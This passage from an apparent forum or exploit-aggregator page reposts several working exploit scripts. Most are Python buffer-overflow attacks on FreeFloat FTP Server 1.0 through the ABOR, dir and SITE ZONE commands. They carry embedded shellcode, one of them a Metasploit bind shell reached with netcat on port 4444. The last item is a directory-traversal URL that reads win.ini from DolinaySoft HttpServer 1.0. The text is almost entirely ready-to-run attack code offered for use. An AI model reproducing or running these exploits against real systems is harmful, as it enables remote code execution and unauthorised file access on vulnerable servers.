+ ret + buffer + '\x43'*(696-len(buffer)) print "Sending Buffer" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('192.168.74.133', 21)) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) s.send('ABOR' + buffer1 + '\r\n') s.close()
  15. Hacking

    import socket import sys import os print ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScrR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: FreefloatFTPserver1.0_dir_command_remotecode_exploit # Date: 2016.11.02 # Exploit Author: Greg Priest # Version: FreefloatFTPserver1.0 # Tested on: Windows7 x64 HUN/ENG Professional ''' ip = raw_input("Target ip: ") port = 21 overflow = 'A' * 247 eip = '\xF4\xAF\xEA\x75' + '\x90' * 10 #shellcode calc.exe shellcode =( "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" + "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" + "\x77\x20\x8b\x3f\x80\x7e\x0c\x33" + "\x75\xf2\x89\xc7\x03\x78\x3c\x8b" + "\x57\x78\x01\xc2\x8b\x7a\x20\x01" + "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" + "\x45\x81\x3e\x43\x72\x65\x61\x75" + "\xf2\x81\x7e\x08\x6f\x63\x65\x73" + "\x75\xe9\x8b\x7a\x24\x01\xc7\x66" + "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" + "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" + "\xb1\xff\x53\xe2\xfd\x68\x63\x61" + "\x6c\x63\x89\xe2\x52\x52\x53\x53" + "\x53\x53\x53\x53\x52\x53\xff\xd7") remotecode = overflow + eip + shellcode + '\r\n' s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect((ip ,port)) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASSW hacker@hacker.net\r\n') s.recv(1024) print ''' Successfull Exploitation! ''' message = 'dir ' + remotecode s.send(message) s.recv(1024) s.close
  16. #!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: FreeFloat FTP Server BoF SITE ZONE Command # Date: 04/11/2016 # Exploit Author: Luis Noriega # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Version: 1.0 # Tested on: Windows XP Profesional V. 5.1 Service Pack 3 # CVE : n/a import socket # shellcode with metasploit: # msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c # nc 192.168.1.150 4444 ret = "\x2F\x1D\xF1\x77" # GDI32.dll shellcode = ("\xb8\x78\xa3\x16\x0c\xdd\xc2\xd9\x74\x24\xf4\x5b\x31\xc9\xb1" "\x53\x31\x43\x12\x83\xeb\xfc\x03\x3b\xad\xf4\xf9\x47\x59\x7a" "\x01\xb7\x9a\x1b\x8b\x52\xab\x1b\xef\x17\x9c\xab\x7b\x75\x11" "\x47\x29\x6d\xa2\x25\xe6\x82\x03\x83\xd0\xad\x94\xb8\x21\xac" "\x16\xc3\x75\x0e\x26\x0c\x88\x4f\x6f\x71\x61\x1d\x38\xfd\xd4" "\xb1\x4d\x4b\xe5\x3a\x1d\x5d\x6d\xdf\xd6\x5c\x5c\x4e\x6c\x07" "\x7e\x71\xa1\x33\x37\x69\xa6\x7e\x81\x02\x1c\xf4\x10\xc2\x6c" "\xf5\xbf\x2b\x41\x04\xc1\x6c\x66\xf7\xb4\x84\x94\x8a\xce\x53" "\xe6\x50\x5a\x47\x40\x12\xfc\xa3\x70\xf7\x9b\x20\x7e\xbc\xe8" "\x6e\x63\x43\x3c\x05\x9f\xc8\xc3\xc9\x29\x8a\xe7\xcd\x72\x48" "\x89\x54\xdf\x3f\xb6\x86\x80\xe0\x12\xcd\x2d\xf4\x2e\x8c\x39" "\x39\x03\x2e\xba\x55\x14\x5d\x88\xfa\x8e\xc9\xa0\x73\x09\x0e" "\xc6\xa9\xed\x80\x39\x52\x0e\x89\xfd\x06\x5e\xa1\xd4\x26\x35" "\x31\xd8\xf2\xa0\x39\x7f\xad\xd6\xc4\x3f\x1d\x57\x66\xa8\x77" "\x58\x59\xc8\x77\xb2\xf2\x61\x8a\x3d\xed\x2d\x03\xdb\x67\xde" "\x45\x73\x1f\x1c\xb2\x4c\xb8\x5f\x90\xe4\x2e\x17\xf2\x33\x51" "\xa8\xd0\x13\xc5\x23\x37\xa0\xf4\x33\x12\x80\x61\xa3\xe8\x41" "\xc0\x55\xec\x4b\xb2\xf6\x7f\x10\x42\x70\x9c\x8f\x15\xd5\x52" "\xc6\xf3\xcb\xcd\x70\xe1\x11\x8b\xbb\xa1\xcd\x68\x45\x28\x83" "\xd5\x61\x3a\x5d\xd5\x2d\x6e\x31\x80\xfb\xd8\xf7\x7a\x4a\xb2" "\xa1\xd1\x04\x52\x37\x1a\x97\x24\x38\x77\x61\xc8\x89\x2e\x34" "\xf7\x26\xa7\xb0\x80\x5a\x57\x3e\x5b\xdf\x67\x75\xc1\x76\xe0" "\xd0\x90\xca\x6d\xe3\x4f\x08\x88\x60\x65\xf1\x6f\x78\x0c\xf4" "\x34\x3e\xfd\x84\x25\xab\x01\x3a\x45\xfe") buffer = '\x90' * 30 + shellcode buffer1 = '\x4C' * 242 + ret + buffer + '\x41' * (749-len(buffer)) print "Sending Buffer" s = socket.socket(socket.AF_INET, socket. SOCK_STREAM) connect = s.connect(('192.168.1.150', 21)) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) s.send('SITE ZONE' + buffer1 + '\r\n') s.close()
  17. Hacking

    # Exploit Title: HttpServer 1.0 DolinaySoft Directory Traversal # Date: 2017-03-19 # Exploit Author: malwrforensics # Software Link: http://www.softpedia.com/get/Internet/Servers/WEB-Servers/HttpServer.shtml#download # Version: 1.0 # Tested on: Windows Exploiting this issue will allow an attacker to view arbitrary files within the context of the web server. Example: Assuming the root folder is c:\<app_folder>\<html_folder> http://<server>/..%5c..%5c/windows/win.ini